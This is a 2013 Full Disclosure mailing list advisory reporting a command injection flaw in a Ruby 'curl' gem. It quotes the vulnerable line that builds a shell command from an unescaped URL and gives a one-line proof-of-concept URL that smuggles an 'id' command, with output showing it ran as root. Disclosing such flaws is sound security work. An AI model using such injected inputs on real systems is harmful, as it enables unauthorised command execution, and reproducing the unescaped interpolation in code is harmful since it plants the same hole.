Full Disclosure mailing list archives
Curl Ruby Gem Remote command execution
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 12 Mar 2013 23:07:48 +0000 (GMT)
Curl Ruby Gem Remote command execution 3/12/2013 https://github.com/tg0/curl Specially crafted URLs can result in remote code execution: In ./lib/curl.rb the following lines: 131 cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref} \"{url}\" " 132 if @debug 133 puts cmd.red 134 end 135 result = open_pipe(cmd) PoC: page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"") larry@underfl0w:/tmp$ cat p uid=0(root) gid=0(root) groups=0(root) Larry W. Cashdollar @_larry0 http://vapid.dhs.org
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Curl Ruby Gem Remote command execution Larry W. Cashdollar (Mar 12)